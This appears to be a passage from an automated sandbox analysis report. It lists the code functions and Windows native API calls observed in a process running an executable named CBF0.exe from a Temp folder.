Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B618BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B619BBE RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B60138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58A3A0 ZwGetCompleteWnfStateSubscription,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B574BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B618A62 RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589A50 ZwCreateFile,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B549240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D1242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B545210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589A00 ZwProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589A30 ZwTerminateThread,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B548239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B544A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B618214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D4A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B56A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B56FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D1AD6 ZwFreeVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58AAC0 ZwQueryWnfStateNameInformation,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589AE0 ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58AAE0 ZwRaiseException,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B618ADD RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58AA90 ZwQuerySystemInformationEx,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B54429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B562280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58B280 ZwWow64DebuggerCall,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57DA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589AB0 ZwWaitForMultipleObjects,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57E2BB ZwWaitForAlertByThreadId,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B541AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B575AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B54F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B618966 RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58B150 ZwUnsubscribeWnfStateChange,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B54395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B56B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57D976 ZwCreateFile,ZwCreateFile,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B54B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D1976 ZwCreateEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58B160 ZwUpdateWnfStateData,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58A160 ZwCreateWorkerFactory,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B549100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B550100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589900 ZwOpenEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B61F13B ZwOpenKey,ZwCreateKey,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5E5100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D193B ZwRaiseException,ZwTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58A130 ZwCreateWaitCompletionPacket,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589920 ZwDuplicateToken,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B6189E7 RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D19C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B6049A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589990 ZwQueryVolumeInformationFile,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B54519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B56C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B61F1B5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58B180 ZwWaitForAlertByThreadId,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589980 ZwCreateEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5F6186 ZwQueryValueKey,memmove,RtlInitUnicodeString,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5C51BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58A9B0 ZwQueryLicenseValue,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57C9BF DbgPrintEx,wcsrchr,memcpy,DbgPrintEx,ZwClose,DbgPrintEx,DbgPrintEx,RtlDosPathNameToRelativeNtPathName_U,DbgPrintEx,ZwOpenFile,ZwClose,RtlFreeHeap,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlDeleteBoundaryDescriptor,ZwClose,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B60A189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58B1A0 ZwWaitForKeyedEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B545050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589850 ZwQueryDirectoryFile,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589840 ZwDelayExecution,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D1879 ZwAllocateVirtualMemory,memset,RtlInitializeSid,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B618858 ZwAlertThreadByThreadId,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B55106F ZwOpenKey,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B54F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589830 ZwOpenFile,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B574020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B61F019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5898D0 ZwQueryAttributesFile,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58A0D0 ZwCreateTimer2,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5810D7 ZwOpenKey,ZwCreateKey,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5470C0 ZwClose,RtlFreeHeap,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5800C2 ZwAlertThreadByThreadId,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B54B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5440FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5F60E9 ZwOpenKey,ZwClose,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B56E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58A890 ZwQueryDebugFilterState,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589890 ZwFsControlFile,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58108B ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B543880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57A080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58B0B0 ZwTraceControl,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5718B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B56F0AE ZwSetInformationWorkerFactory,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5F60A2 ZwQueryInformationFile,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D5F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589750 ZwQueryInformationThread,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B618F6A RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B580F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589740 ZwOpenThreadToken,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589F70 ZwCreateIoCompletion,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589770 ZwSetInformationFile,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5FCF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B546F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58AF60 ZwSetTimer2,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57CF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589710 ZwQueryInformationToken,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D6715 memset,memcpy,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B579702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589730 ZwQueryVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5FCF30 ZwAlertThreadByThreadId,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58AFD0 ZwShutdownWorkerFactory,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B54F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5897C0 ZwTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57D7CA RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B550FFD RtlInitUnicodeString,ZwQueryValueKey,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D0FEC ZwDuplicateObject,ZwDuplicateObject,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5737EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57FF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5F5F87 ZwUnmapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D5780 DbgPrompt,ZwWow64DebuggerCall,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B542FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5897A0 ZwUnmapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B583FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58B650 RtlUnhandledExceptionFilter,ZwTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589650 ZwQueryValueKey,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D6652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58B640 RtlUnhandledExceptionFilter,ZwTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B58AE70 ZwSetInformationWorkerFactory,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589670 ZwQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B57BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B613E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B582E1C RtlInitializeCriticalSectionEx,ZwDelayExecution,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D2E14 RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B54C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5FFE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B54B630 ZwWaitForKeyedEvent,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589E30 ZwCancelWaitCompletionPacket,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B589E20 ZwCancelTimer2,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5466D4 RtlInitUnicodeString,ZwQueryValueKey,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B579ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5896D0 ZwCreateKey,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B542ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5896C0 ZwSetInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B54B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5D16FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B59DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B5576FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe, Code function: 29_2_6B56E6F9 ZwAlpcSetInformation,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5896E0 ZwFreeVirtualMemory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FBE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542E9F ZwCreateEvent,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B613EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D2EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent,
